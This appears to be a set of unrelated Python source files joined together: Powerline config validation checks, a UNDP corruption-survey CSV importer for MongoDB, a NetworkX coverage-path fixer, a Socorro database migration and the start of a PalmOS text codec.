havemarks(segment_type)
if segment_type not in type_keys:
echoerr(context='Error while checking segments (key {key})'.format(key=context.key),
problem='found segment with unknown type {0}'.format(segment_type),
problem_mark=segment_type.mark)
return False, False, True
hadproblem = False
keys = set(segment)
if not ((keys - generic_keys) < type_keys[segment_type]):
unknown_keys = keys - generic_keys - type_keys[segment_type]
echoerr(
context='Error while checking segments (key {key})'.format(key=context.key),
context_mark=context[-1][1].mark,
problem='found keys not used with the current segment type: {0}'.format(
list_sep.join(unknown_keys)),
problem_mark=list(unknown_keys)[0].mark
)
hadproblem = True
if not (keys >= required_keys[segment_type]):
missing_keys = required_keys[segment_type] - keys
echoerr(
context='Error while checking segments (key {key})'.format(key=context.key),
context_mark=context[-1][1].mark,
problem='found missing required keys: {0}'.format(
list_sep.join(missing_keys))
)
hadproblem = True
if not (segment_type == 'function' or (keys & highlight_keys)):
echoerr(
context='Error while checking segments (key {key})'.format(key=context.key),
context_mark=context[-1][1].mark,
problem=(
'found missing keys required to determine highlight group. '
'Either highlight_groups or name key must be present'
)
)
hadproblem = True
return True, False, hadproblem
def check_segment_module(module, data, context, echoerr):
havemarks(module)
with WithPath(data['import_paths']):
try:
__import__(str(module))
except ImportError as e:
if echoerr.logger.level >= logging.DEBUG:
echoerr.logger.exception(e)
echoerr(context='Error while checking segments (key {key})'.format(key=context.key),
problem='failed to import module {0}'.format(module),
problem_mark=module.mark)
return True, False, True
return True, False, False
def check_full_segment_data(segment, data, context, echoerr):
if 'name' not in segment and 'function' not in segment:
return True, False, False
ext = data['ext']
theme_segment_data = context[0][1].get('segment_data', {})
main_theme_name = data['main_config'].get('ext', {}).get(ext, {}).get('theme', None)
if not main_theme_name or data['theme'] == main_theme_name:
top_segment_data = {}
else:
top_segment_data = data['ext_theme_configs'].get(main_theme_name, {}).get('segment_data', {})
if segment.get('type', 'function') == 'function':
function_name = segment.get('function')
if function_name:
module, function_name = get_function_strings(function_name, context, ext)
names = [module + '.' + function_name, function_name]
else:
names = []
elif segment.get('name'):
names = [segment['name']]
else:
return True, False, False
segment_copy = segment.copy()
for key in ('before', 'after', 'args', 'contents'):
if key not in segment_copy:
for segment_data in [theme_segment_data, top_segment_data]:
for name in names:
try:
val = segment_data[name][key]
k = segment_data[name].keydict[key]
segment_copy[k] = val
except KeyError:
pass
return check_key_compatibility(segment_copy, data, context, echoerr)
highlight_group_spec = Spec().ident().copy
_highlight_group_spec = highlight_group_spec().context_message(
'Error while checking function documentation while checking theme (key {key})')
def check_hl_group_name(hl_group, context_mark, context, echoerr):
'''Check highlight group name: it should match naming conventions
:param str hl_group:
Checked group.
:param Mark context_mark:
Context mark. May be ``None``.
:param Context context:
Current context.
:param func echoerr:
Function used for error reporting.
:return: ``False`` if check succeeded and ``True`` if it failed.
'''
return _highlight_group_spec.match(hl_group, context_mark=context_mark, context=context, echoerr=echoerr)[1]
def check_segment_function(function_name, data, context, echoerr):
havemarks(function_name)
ext = data['ext']
module, function_name = get_function_strings(function_name, context, ext)
if context[-2][1].get('type', 'function') == 'function':
func = import_segment(function_name, data, context, echoerr, module=module)
if not func:
return True, False, True
hl_groups = []
divider_hl_group = None
hadproblem = False
if func.__doc__:
NO_H_G_USED_STR = 'No highlight groups are used (literal segment).'
H_G_USED_STR = 'Highlight groups used: '
LHGUS = len(H_G_USED_STR)
D_H_G_USED_STR = 'Divider highlight group used: '
LDHGUS = len(D_H_G_USED_STR)
pointer = 0
mark_name = '<{0} docstring>'.format(function_name)
for i, line in enumerate(func.__doc__.split('\n')):
if H_G_USED_STR in line:
idx = line.index(H_G_USED_STR) + LHGUS
if hl_groups is None:
idx -= LHGUS
mark = Mark(mark_name, i + 1, idx + 1, func.__doc__, pointer + idx)
echoerr(
context='Error while checking theme (key {key})'.format(key=context.key),
context_mark=function_name.mark,
problem=(
'found highlight group definition in addition to sentense stating that '
'no highlight groups are used'
),
problem_mark=mark,
)
hadproblem = True
continue
hl_groups.append((
line[idx:],
(mark_name, i + 1, idx + 1, func.__doc__),
pointer + idx
))
elif D_H_G_USED_STR in line:
idx = line.index(D_H_G_USED_STR) + LDHGUS + 2
mark = Mark(mark_name, i + 1, idx + 1, func.__doc__, pointer + idx)
divider_hl_group = MarkedUnicode(line[idx:-3], mark)
elif NO_H_G_USED_STR in line:
idx = line.index(NO_H_G_USED_STR)
if hl_groups:
mark = Mark(mark_name, i + 1, idx + 1, func.__doc__, pointer + idx)
echoerr(
context='Error while checking theme (key {key})'.format(key=context.key),
context_mark=function_name.mark,
problem=(
'found sentense stating that no highlight groups are used '
'in addition to highlight group definition'
),
problem_mark=mark,
)
hadproblem = True
continue
hl_groups = None
pointer += len(line) + len('\n')
if divider_hl_group:
r = hl_exists(divider_hl_group, data, context, echoerr, allow_gradients=True)
if r:
echoerr(
context='Error while checking theme (key {key})'.format(key=context.key),
context_mark=function_name.mark,
problem=(
'found highlight group {0} not defined in the following colorschemes: {1}\n'
'(Group name was obtained from function documentation.)'
).format(divider_hl_group, list_sep.join(r)),
problem_mark=divider_hl_group.mark,
)
hadproblem = True
if check_hl_group_name(divider_hl_group, function_name.mark, context, echoerr):
hadproblem = True
if hl_groups:
greg = re.compile(r'``([^`]+)``( \(gradient\))?')
parsed_hl_groups = []
for line, mark_args, pointer in hl_groups:
for s in line.split(', '):
required_pack = []
sub_pointer = pointer
for subs in s.split(' or '):
match = greg.match(subs)
try:
if not match:
continue
hl_group = MarkedUnicode(
match.group(1),
Mark(*mark_args, pointer=sub_pointer + match.start(1))
)
if check_hl_group_name(hl_group, function_name.mark, context, echoerr):
hadproblem = True
gradient = bool(match.group(2))
required_pack.append((hl_group, gradient))
finally:
sub_pointer += len(subs) + len(' or ')
parsed_hl_groups.append(required_pack)
pointer += len(s) + len(', ')
del hl_group, gradient
for required_pack in parsed_hl_groups:
rs = [
hl_exists(hl_group, data, context, echoerr, allow_gradients=('force' if gradient else False))
for hl_group, gradient in required_pack
]
if all(rs):
echoerr(
context='Error while checking theme (key {key})'.format(key=context.key),
problem=(
'found highlight groups list ({0}) with all groups not defined in some colorschemes\n'
'(Group names were taken from function documentation.)'
).format(list_sep.join((h[0] for h in required_pack))),
problem_mark=function_name.mark
)
for r, h in zip(rs, required_pack):
echoerr(
context='Error while checking theme (key {key})'.format(key=context.key),
problem='found highlight group {0} not defined in the following colorschemes: {1}'.format(
h[0], list_sep.join(r))
)
hadproblem = True
elif hl_groups is not None:
r = hl_exists(function_name, data, context, echoerr, allow_gradients=True)
if r:
echoerr(
context='Error while checking theme (key {key})'.format(key=context.key),
problem=(
'found highlight group {0} not defined in the following colorschemes: {1}\n'
'(If not specified otherwise in documentation, '
'highlight group for function segments\n'
'is the same as the function name.)'
).format(function_name, list_sep.join(r)),
problem_mark=function_name.mark
)
hadproblem = True
return True, False, hadproblem
elif context[-2][1].get('type') != 'segment_list':
if function_name not in context[0][1].get('segment_data', {}):
main_theme_name = data['main_config'].get('ext', {}).get(ext, {}).get('theme', None)
if data['theme'] == main_theme_name:
main_theme = {}
else:
main_theme = data['ext_theme_configs'].get(main_theme_name, {})
if (
function_name not in main_theme.get('segment_data', {})
and function_name not in data['ext_theme_configs'].get('__main__', {}).get('segment_data', {})
and not any(((function_name in theme.get('segment_data', {})) for theme in data['top_themes'].values()))
):
echoerr(context='Error while checking segments (key {key})'.format(key=context.key),
problem='found useless use of name key (such name is not present in theme/segment_data)',
problem_mark=function_name.mark)
return True, False, False
def hl_group_in_colorscheme(hl_group, cconfig, allow_gradients, data, context, echoerr):
havemarks(hl_group, cconfig)
if hl_group not in cconfig.get('groups', {}):
return False
elif not allow_gradients or allow_gradients == 'force':
group_config = cconfig['groups'][hl_group]
while isinstance(group_config, unicode):
try:
group_config = cconfig['groups'][group_config]
except KeyError:
# No such group. Error was already reported when checking
# colorschemes.
return True
havemarks(group_config)
hadgradient = False
for ckey in ('fg', 'bg'):
color = group_config.get(ckey)
if not color:
# No color. Error was already reported when checking
# colorschemes.
return True
havemarks(color)
# Gradients are only allowed for function segments. Note that
# whether *either* color or gradient exists should have been
# already checked
hascolor = color in data['colors_config'].get('colors', {})
hasgradient = color in data['colors_config'].get('gradients', {})
if hasgradient:
hadgradient = True
if allow_gradients is False and not hascolor and hasgradient:
echoerr(
context='Error while checking highlight group in theme (key {key})'.format(
key=context.key),
context_mark=hl_group.mark,
problem='group {0} is using gradient {1} instead of a color'.format(hl_group, color),
problem_mark=color.mark
)
return False
if allow_gradients == 'force' and not hadgradient:
echoerr(
context='Error while checking highlight group in theme (key {key})'.format(
key=context.key),
context_mark=hl_group.mark,
problem='group {0} should have at least one gradient color, but it has no'.format(hl_group),
problem_mark=group_config.mark
)
return False
return True
def hl_exists(hl_group, data, context, echoerr, allow_gradients=False):
havemarks(hl_group)
ext = data['ext']
if ext not in data['colorscheme_configs']:
# No colorschemes. Error was already reported, no need to report it
# twice
return []
r = []
found = False
for colorscheme, cconfig in data['colorscheme_configs'][ext].items():
if hl_group_in_colorscheme(hl_group, cconfig, allow_gradients, data, context, echoerr):
found = True
else:
r.append(colorscheme)
if not found:
pass
return r
def check_highlight_group(hl_group, data, context, echoerr):
havemarks(hl_group)
r = hl_exists(hl_group, data, context, echoerr)
if r:
echoerr(
context='Error while checking theme (key {key})'.format(key=context.key),
problem='found highlight group {0} not defined in the following colorschemes: {1}'.format(
hl_group, list_sep.join(r)),
problem_mark=hl_group.mark
)
return True, False, True
return True, False, False
def check_highlight_groups(hl_groups, data, context, echoerr):
havemarks(hl_groups)
rs = [hl_exists(hl_group, data, context, echoerr) for hl_group in hl_groups]
if all(rs):
echoerr(
context='Error while checking theme (key {key})'.format(key=context.key),
problem='found highlight groups list ({0}) with all groups not defined in some colorschemes'.format(
list_sep.join((unicode(h) for h in hl_groups))),
problem_mark=hl_groups.mark
)
for r, hl_group in zip(rs, hl_groups):
echoerr(
context='Error while checking theme (key {key})'.format(key=context.key),
problem='found highlight group {0} not defined in the following colorschemes: {1}'.format(
hl_group, list_sep.join(r)),
problem_mark=hl_group.mark
)
return True, False, True
return True, False, False
def check_segment_data_key(key, data, context, echoerr):
havemarks(key)
has_module_name = '.' in key
found = False
for ext, theme in list_themes(data, context):
for segments in theme.get('segments', {}).values():
for segment in segments:
if 'name' in segment:
if key == segment['name']:
found = True
break
else:
function_name = segment.get('function')
if function_name:
module, function_name = get_function_strings(function_name, ((None, theme),), ext)
if has_module_name:
full_name = module + '.' + function_name
if key == full_name:
found = True
break
else:
if key == function_name:
found = True
break
if found:
break
if found:
break
else:
if data['theme_type'] != 'top':
echoerr(context='Error while checking segment data',
problem='found key {0} that cannot be associated with any segment'.format(key),
problem_mark=key.mark)
return True, False, True
return True, False, False
threaded_args_specs = {
'interval': Spec().cmp('gt', 0.0),
'update_first': Spec().type(bool),
'shutdown_event': Spec().error('Shutdown event must be set by powerline'),
}
def check_args_variant(func, args, data, context, echoerr):
havemarks(args)
argspec = getconfigargspec(func)
present_args = set(args)
all_args = set(argspec.args)
required_args = set(argspec.args[:-len(argspec.defaults)])
hadproblem = False
if required_args - present_args:
echoerr(
context='Error while checking segment arguments (key {key})'.format(key=context.key),
context_mark=args.mark,
problem='some of the required keys are missing: {0}'.format(list_sep.join(required_args - present_args))
)
hadproblem = True
if not all_args >= present_args:
echoerr(context='Error while checking segment arguments (key {key})'.format(key=context.key),
context_mark=args.mark,
problem='found unknown keys: {0}'.format(list_sep.join(present_args - all_args)),
problem_mark=next(iter(present_args - all_args)).mark)
hadproblem = True
if isinstance(func, ThreadedSegment):
for key in set(threaded_args_specs) & present_args:
proceed, khadproblem = threaded_args_specs[key].match(
args[key],
args.mark,
data,
context.enter_key(args, key),
echoerr
)
if khadproblem:
hadproblem = True
if not proceed:
return hadproblem
return hadproblem
def check_args(get_functions, args, data, context, echoerr):
new_echoerr = DelayedEchoErr(echoerr)
count = 0
hadproblem = False
for func in get_functions(data, context, new_echoerr):
count += 1
shadproblem = check_args_variant(func, args, data, context, echoerr)
if shadproblem:
hadproblem = True
if not count:
hadproblem = True
if new_echoerr:
new_echoerr.echo_all()
else:
echoerr(context='Error while checking segment arguments (key {key})'.format(key=context.key),
context_mark=context[-2][1].mark,
problem='no suitable segments found')
return True, False, hadproblem
def get_one_segment_function(data, context, echoerr):
ext = data['ext']
function_name = context[-2][1].get('function')
if function_name:
module, function_name = get_function_strings(function_name, context, ext)
func = import_segment(function_name, data, context, echoerr, module=module)
if func:
yield func
common_names = defaultdict(set)
def register_common_name(name, cmodule, cname):
s = cmodule + '.' + cname
cmodule_mark = Mark('<common name definition>', 1, 1, s, 1)
cname_mark = Mark('<common name definition>', 1, len(cmodule) + 1, s, len(cmodule) + 1)
common_names[name].add((MarkedUnicode(cmodule, cmodule_mark), MarkedUnicode(cname, cname_mark)))
def get_all_possible_functions(data, context, echoerr):
name = context[-2][0]
module, name = name.rpartition('.')[::2]
if module:
func = import_segment(name, data, context, echoerr, module=module)
if func:
yield func
else:
if name in common_names:
for cmodule, cname in common_names[name]:
cfunc = import_segment(cname, data, context, echoerr, module=MarkedUnicode(cmodule, None))
if cfunc:
yield cfunc
for ext, theme_config in list_themes(data, context):
for segments in theme_config.get('segments', {}).values():
for segment in segments:
if segment.get('type', 'function') == 'function':
function_name = segment.get('function')
current_name = segment.get('name')
if function_name:
module, function_name = get_function_strings(function_name, ((None, theme_config),), ext)
if current_name == name or function_name == name:
func = import_segment(function_name, data, context, echoerr, module=module)
if func:
yield func
def check_exinclude_function(name, data, context, echoerr):
ext = data['ext']
module, name = name.rpartition('.')[::2]
if not module:
module = MarkedUnicode('powerline.selectors.' + ext, None)
func = import_function('selector', name, data, context, echoerr, module=module)
if not func:
return True, False, True
return True, False, False
def check_log_file_level(this_level, data, context, echoerr):
'''Check handler level specified in :ref:`log_file key <config-common-log>`
This level must be greater or equal to the level in :ref:`log_level key
<config-common-log_level>`.
'''
havemarks(this_level)
hadproblem = False
top_level = context[0][1].get('common', {}).get('log_level', 'WARNING')
top_level_str = top_level
top_level_mark = getattr(top_level, 'mark', None)
if (
not isinstance(top_level, unicode) or not hasattr(logging, top_level)
or not isinstance(this_level, unicode) or not hasattr(logging, this_level)
):
return True, False, hadproblem
top_level = getattr(logging, top_level)
this_level_str = this_level
this_level_mark = this_level.mark
this_level = getattr(logging, this_level)
if this_level < top_level:
echoerr(
context='Error while checking log level index (key {key})'.format(
key=context.key),
context_mark=this_level_mark,
problem='found level that is less critical then top level ({0} < {0})'.format(
this_level_str, top_level_str),
problem_mark=top_level_mark,
)
hadproblem = True
return True, False, hadproblem
def check_logging_handler(handler_name, data, context, echoerr):
havemarks(handler_name)
import_paths = [os.path.expanduser(path) for path in context[0][1].get('common', {}).get('paths', [])]
handler_module, separator, handler_class = handler_name.rpartition('.')
if not separator:
handler_module = 'logging.handlers'
handler_class = handler_name
with WithPath(import_paths):
try:
handler = getattr(__import__(str(handler_module), fromlist=[str(handler_class)]), str(handler_class))
except ImportError:
echoerr(context='Error while loading logger class (key {key})'.format(key=context.key),
problem='failed to load module {0}'.format(handler_module),
problem_mark=handler_name.mark)
return True, False, True
except AttributeError:
echoerr(context='Error while loading logger class (key {key})'.format(key=context.key),
problem='failed to load handler class {0}'.format(handler_class),
problem_mark=handler_name.mark)
return True, False, True
if not issubclass(handler, logging.Handler):
echoerr(context='Error while loading logger class (key {key})'.format(key=context.key),
problem='loaded class {0} is not a logging.Handler subclass'.format(handler_class),
problem_mark=handler_name.mark)
return True, False, True
return True, False, False
|
opendatakosovo/undp-gender-survey-of-corruption-data-importer | refs/heads/master | gender_survey.py | 1 | from pymongo import MongoClient
import csv
import re
mongo = MongoClient()
db = mongo.undp
collection = db.gsc
collection.remove({})
def parse():
print "\nImporting data..."
with open('data/undpGenderSurveyOfCorruption.csv', 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
# Skip the header rows
next(reader, None)
doc_count = 0
for row in reader:
doc = {
"surveyee": build_surveyee_doc(row),
"q1": build_q1_doc(row),
"q2": build_q2_doc(row),
"q3": build_q3_doc(row),
"q4": build_q4_doc(row),
"q5": build_q5_doc(row),
"q6": build_q6_doc(row),
"q7": build_q7_doc(row),
"q8": build_q8_doc(row),
"q9": build_q9_doc(row),
"q10": build_q10_doc(row),
"q11": build_q11_doc(row),
"q12": build_q12_doc(row),
"q13": build_q13_doc(row),
"q14": build_q14_doc(row),
"q15": build_q15_doc(row),
}
collection.insert(doc)
doc_count = doc_count + 1
print "Done. Imported %i surveys.\n" % doc_count
def build_surveyee_doc(row):
age_range = row[74]
age = {}
if age_range == '60+':
age = {
"label": row[74],
"from" : 60
}
else:
age_range = row[74].split(' ')[0]
age = {
"label": row[74],
"from" : int(age_range.split('-')[0]),
"to" : int(age_range.split('-')[1]),
}
income_range = re.findall(r'\d+', row[80])
income = {}
if row[80] != "No answer / Refuse":
if len(income_range) == 1 and row[80].startswith("Less"):
income = {
"label": row[80],
"from" : int(income_range[0])
}
elif len(income_range) == 1:
income = {
"label": row[80],
"to" : int(income_range[0]),
}
else:
income = {
"label": row[80],
"from" : int(income_range[0]),
"to" : int(income_range[1]),
}
else:
income = {
"label": row[80]
}
doc = {
"gender": row[72],
"ethnicity": row[73],
"age": age,
"maritalstatus": row[75],
"employment": {
"level": row[76],
"institution": row[77],
"position": row[78],
},
"education": row[79],
"income": income,
"municipality": row[81],
"region": row[82]
}
return doc
def build_q1_doc(row):
doc = {
"question": "Which of these practices within the workplace do you think are corrupt?",
"answers": {
"a1": {
"text": "Accepting gifts or hospitality from a civil servant",
"value": convert_to_int(row[0]),
},
"a2": {
"text": "Taking supplies or materials from work for home use",
"value": convert_to_int(row[1]),
},
"a3": {
"text": "Paying or receiving rewards for keeping silent about workplace issues",
"value": convert_to_int(row[2]),
},
"a4": {
"text": "Performing or receiving sexual favors in exchange for promotion or money",
"value": convert_to_int(row[3]),
},
"a5": {
"text": "Paying or receiving payment for a promotion or permanent job within the civil service",
"value": convert_to_int(row[4]),
},
"a6": {
"text": "Paying or receiving a payment for awarding contracts or positions",
"value": convert_to_int(row[5]),
},
"a7": {
"text": "Not declaring a conflict of interest when recruiting staff or awarding contracts",
"value": convert_to_int(row[6]),
},
"a8": {
"text": "Not working required hours",
"value": convert_to_int(row[7]),
},
"a9": {
"text": "Leaving work early without permission",
"value": convert_to_int(row[8]),
},
"a10": {
"text": "Flirting with a colleague",
"value": convert_to_int(row[9]),
},
"a11": {
"text": "Asking friends who are well connected for favors to help your government work",
"value": convert_to_int(row[10]),
},
"a12": {
"text": "Claiming reimbursements to attend private functions hosted by a work colleague",
"value": convert_to_int(row[11]),
},
}
}
return doc
def build_q2_doc(row):
doc = {
"question": "What forms of corruption do you believe exist across the entire civil service in your country?",
"answers": {
"a1": {
"text": "Embezzlement, theft (including time theft not working required hours) and fraud",
"value": convert_to_int(row[12]),
},
"a2": {
"text": "Extortion (including sexual extortion)",
"value": convert_to_int(row[13]),
},
"a3": {
"text": "Nepotism, favoritism and patronage",
"value": convert_to_int(row[14]),
},
"a4": {
"text": "Bribery",
"value": convert_to_int(row[15]),
},
"a5": {
"text": "Abuse of discretionary powers",
"value": convert_to_int(row[16]),
},
"a6": {
"text": "Trading in influence",
"value": convert_to_int(row[17]),
},
},
}
return doc
def build_q3_doc(row):
doc = {
"question": "How prevalent do you believe corruption is in the civil service of your country?",
"answers": {
"a1": {
"text": "Not prevalent",
"value": 0,
},
"a2": {
"text": "A bit prevalent",
"value": 0,
},
"a3": {
"text": "Somewhat prevalent",
"value": 0,
},
"a4": {
"text": "Prevalent",
"value": 0,
},
"a5": {
"text": "Very prevalent",
"value": 0,
}
}
}
answer_key = "a" + row[18]
doc['answers'][answer_key]['value'] = 1
return doc
def build_q4_doc(row):
doc = {
"question": "Have you ever witnessed corruption in your current workplace?",
"answers": {
"a1": {
"text": "No",
"value": 0,
},
"a2": {
"text": "Yes",
"value": 0,
}
}
}
answer = convert_to_int(row[19])
doc['answers']['a' + str(answer + 1)]['value'] = 1
return doc
def build_q5_doc(row):
doc = {
"question": "What best describes the corruption you witnessed?",
"answers": {
"a1": {
"text": "Embezzlement, theft (including time theft not working required hours) and fraud",
"value": convert_to_int(row[20]),
},
"a2": {
"text": "Extortion (including sexual extortion)",
"value": convert_to_int(row[21]),
},
"a3": {
"text": "Nepotism, favoritism and patronage",
"value": convert_to_int(row[22]),
},
"a4": {
"text": "Bribery",
"value": convert_to_int(row[23]),
},
"a5": {
"text": "Abuse of discretionary powers",
"value": convert_to_int(row[24]),
},
"a6": {
"text": "Trading in influence",
"value": convert_to_int(row[25]),
},
}
}
return doc
def build_q6_doc(row):
doc = {
"question": "Did you report the corruption described?",
"answers": {
"a1": {
"text": "No",
"value": 0,
},
"a2": {
"text": "Yes",
"value": 0,
},
"a3": {
"text": "Choose not to answer",
"value": 0,
},
}
}
answer = convert_to_int(row[26])
if answer != 'n/a':
doc['answers']['a' + str(answer + 1)]['value'] = 1
if answer == 0:
doc['followup'] = build_followup_question_doc(row[27])
else:
doc['answers']['a3']['value'] = 1
return doc
def build_q7_doc(row):
doc = {
"question": "In your current workplace, have you ever been asked to participate in corrupt practices?",
"answers": {
"a1": {
"text": "No",
"value": 0,
},
"a2": {
"text": "Yes",
"value": 0,
}
}
}
answer = convert_to_int(row[28])
doc['answers']['a' + str(answer + 1)]['value'] = 1
return doc
def build_q8_doc(row):
doc = {
"question": "What best describes the type of corruption you participated in?",
"answers": {
"a1": {
"text": "Embezzlement, theft (including time theft not working required hours) and fraud",
"value": convert_to_int(row[29]),
},
"a2": {
"text": "Extortion (including sexual extortion)",
"value": convert_to_int(row[30]),
},
"a3": {
"text": "Nepotism, favoritism and patronage",
"value": convert_to_int(row[31]),
},
"a4": {
"text": "Bribery",
"value": convert_to_int(row[32]),
},
"a5": {
"text": "Abuse of discretionary powers",
"value": convert_to_int(row[33]),
},
"a6": {
"text": "Trading in influence",
"value": convert_to_int(row[34]),
},
}
}
return doc
def build_q9_doc(row):
doc = {
"question": "Did you report the corruption described?",
"answers": {
"a1": {
"text": "No",
"value": 0,
},
"a2": {
"text": "Yes",
"value": 0,
},
"a3": {
"text": "Choose not to answer",
"value": 0,
},
}
}
answer = convert_to_int(row[35])
if answer != 'n/a':
doc['answers']['a' + str(answer + 1)]['value'] = 1
if answer == 0:
doc['followup'] = build_followup_question_doc(row[36])
else:
doc['answers']['a3']['value'] = 1
return doc
def build_q10_doc(row):
doc = {
"question": "How does the civil service encourage men and women to speak out against corruption or a lack of transparency in management?",
"answers": {
"a1": {
"text": "It has an established and functional workplace grievance mechanism",
"value": convert_to_int(row[37]),
},
"a2": {
"text": "Information is available on laws and policies relating to corruption, accountability and good governance equally for men",
"value": convert_to_int(row[38]),
},
"a3": {
"text": "Has a senior management team that is equally supportive of men and women employees",
"value": convert_to_int(row[39]),
},
"a3": {
"text": "Gender equality considerations are included in all workplace policies",
"value": convert_to_int(row[40]),
},
"a4": {
"text": "Has a gender responsive anti-corruption policy",
"value": convert_to_int(row[41]),
},
"a5": {
"text": "Men and women employees that report corruption are protected from reprisals",
"value": convert_to_int(row[42]),
},
"a6": {
"text": "Has established relationships with non-government organizations and government organizations working to fight against corrupti",
"value": convert_to_int(row[43]),
},
},
}
return doc
def build_q11_doc(row):
doc = {
"question": "Have workplace policies relating to your employment been made available to you?",
"answers": {
"a1": {
"text": "Recruitment policies and requirements (such as exam results, qualifications, age, level)",
"value": convert_to_int(row[44]),
},
"a2": {
"text": "Salary and remuneration policies including overtime",
"value": convert_to_int(row[45]),
},
"a3": {
"text": "Promotion policies",
"value": convert_to_int(row[46]),
},
"a3": {
"text": "Working hours policies",
"value": convert_to_int(row[47]),
},
"a4": {
"text": "Training or professional development opportunities",
"value": convert_to_int(row[48]),
},
"a5": {
"text": "Retrenchment policies",
"value": convert_to_int(row[49]),
},
"a6": {
"text": "Retirement policies",
"value": convert_to_int(row[50]),
},
"a7": {
"text": "Redundancy policies",
"value": convert_to_int(row[51]),
},
"a8": {
"text": "Disciplinary measures",
"value": convert_to_int(row[52]),
},
"a9": {
"text": "Code of conduct",
"value": convert_to_int(row[53]),
},
"a10": {
"text": "Anti-corruption policies",
"value": convert_to_int(row[54]),
}
}
}
return doc
def build_q12_doc(row):
doc = {
"question": "How would you described the information provided in the policies and regulations?",
"answers": {
"a1": {
"text": "The information provided was relevant to my situation",
"value": convert_to_int(row[55]),
},
"a2": {
"text": "The information was provided in a timely manner",
"value": convert_to_int(row[56]),
},
"a3": {
"text": "The information provided was accurate",
"value": convert_to_int(row[57]),
},
"a4": {
"text": "I could easily understand the information",
"value": convert_to_int(row[58]),
}
}
}
return doc
def build_q13_doc(row):
doc = {
"question": "In your opinion, do men and women enjoy the same working conditions within the civil service?",
"answers": {
"a1": {
"text": "Women and men enjoy the same recruitment requirements (such as exam results, qualifications, age, level)",
"value": convert_to_int(row[59])
},
"a2": {
"text": "Women and men enjoy the same salary and remuneration, including overtime",
"value": convert_to_int(row[60])
},
"a3": {
"text": "Women and men are subject to the same promotion procedures",
"value": convert_to_int(row[61])
},
"a4": {
"text": "Women and men work the same hours",
"value": convert_to_int(row[62])
},
"a5": {
"text": "Women and men enjoy the same training opportunities",
"value": convert_to_int(row[63])
},
"a6": {
"text": "Women and men enjoy the same professional development opportunities",
"value": convert_to_int(row[64])
},
"a7": {
"text": "Women and men are subject to the same retrenchment policies / procedures",
"value": convert_to_int(row[65])
},
"a8": {
"text": "Women and men are subject to the same retirement regulations",
"value": convert_to_int(row[66])
},
"a9": {
"text": "Women and men are subject to the same redundancy packages",
"value": convert_to_int(row[67])
},
"a10": {
"text": "Women and men are subject to the same disciplinary measures",
"value": convert_to_int(row[68])
}
}
}
return doc
def build_q14_doc(row):
doc = {
"question": "Do discretionary powers exist within the public administration whereby management can grant additional pay or benefits to certain employees?",
"answers": {
"a1": {
"text": "No",
"value": 0,
},
"a2": {
"text": "Yes",
"value": 0,
}
}
}
answer = convert_to_int(row[69])
doc['answers']['a' + str(answer + 1)]['value'] = 1
return doc
def build_q15_doc(row):
doc = {
"question": "If you answered yes to the previous question, is the criteria for granting additional pay and benefits made available to all staff?",
"answers": {
"a1": {
"text": "No",
"value": 0,
},
"a2": {
"text": "Yes",
"value": 0,
},
"a3": {
"text": "Choose not to answer",
"value": 0,
},
}
}
answer = convert_to_int(row[70])
if answer != 'n/a':
doc['answers']['a' + str(answer + 1)]['value'] = 1
else:
doc['answers']['a3']['value'] = 1
doc['followup'] = build_followup_question_15_doc(row[71])
return doc
def convert_to_int(data_string):
if data_string == "Yes":
return 1
elif data_string == "No":
return 0
elif data_string == "No, I did not report it because":
return 0
else:
return "n/a"
def convert_followup_answer_to_key_index(answer):
if answer == "Afraid of retaliation":
return 1
elif answer == "Did not want to get involved":
return 2
elif answer == "Does not work":
return 3
elif answer == "The risk of losing my job":
return 4
elif answer == "Do not know":
return 5
else:
return 6
def build_followup_question_doc(answer):
doc = {
"question": "No, I did not report it because",
"answers": {
"a1": {
"text": "Afraid of retaliation",
"value": 0,
},
"a2": {
"text": "Did not want to get involved",
"value": 0,
},
"a3": {
"text": "Does not work",
"value": 0,
},
"a4": {
"text": "The risk of losing my job",
"value": 0,
},
"a5": {
"text": "Do not know",
"value": 0,
},
"a6": {
"text": "Choose not to answer",
"value": 0,
}
}
}
followup_key_index = convert_followup_answer_to_key_index(answer)
doc['answers']['a' + str(followup_key_index)]['value'] = 1
return doc
def build_followup_question_15_doc(answer):
doc = {
"question": "Do you think they are equally accessible for women and men?",
"answers": {
"a1": {
"text": "No",
"value": 0,
},
"a2": {
"text": "Yes",
"value": 0,
},
"a3": {
"text": "Choose not to answer",
"value": 0,
},
}
}
answer_index = convert_to_int(answer)
if answer_index != 'n/a':
doc['answers']['a' + str(answer_index + 1)]['value'] = 1
else:
doc['answers']['a3']['value'] = 1
return doc
parse()
|
ghdk/networkx | refs/heads/master | fixcoverage.py | 30 | import pickle
import re
import sys
def main(argv):
source = argv[1]
dest = argv[2]
with open('.coverage', 'rb') as f:
coverage_data = pickle.load(f)
# Prefilter to filenames in NetworkX
filenames = [filename for filename in coverage_data['lines'].keys()
if 'networkx' in filename]
for filename in filenames:
new_filename = re.sub(source, dest, filename)
if new_filename != filename:
coverage_data['lines'][new_filename] = coverage_data['lines'].pop(filename)
with open('.coverage', 'wb') as f:
pickle.dump(coverage_data, f)
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
bsmedberg/socorro | refs/heads/master | alembic/versions/1495b7307dd3_bug_1005326_filter_out_null.py | 14 | """bug 1005326 - filter out NULL
Revision ID: 1495b7307dd3
Revises: 1961d1f70175
Create Date: 2014-05-06 16:40:36.199526
"""
# revision identifiers, used by Alembic.
revision = '1495b7307dd3'
down_revision = '1961d1f70175'
from alembic import op
from socorro.lib import citexttype, jsontype, buildtype
from socorro.lib.migrations import fix_permissions, load_stored_proc
import sqlalchemy as sa
from sqlalchemy import types
from sqlalchemy.dialects import postgresql
from sqlalchemy.sql import table, column
def upgrade():
load_stored_proc(op, ['update_correlations_addon.sql',
'update_correlations_core.sql',
'update_correlations_module.sql'])
def downgrade():
load_stored_proc(op, ['update_correlations_addon.sql',
'update_correlations_core.sql',
'update_correlations_module.sql'])
|
harmy/kbengine | refs/heads/master | kbe/src/lib/python/Lib/encodings/palmos.py | 647 | """ Python Character Mapping Codec for PalmOS 3.5.
Written by Sjoerd Mullender (sjoerd@acm.org); based on iso8859_15.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_map)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
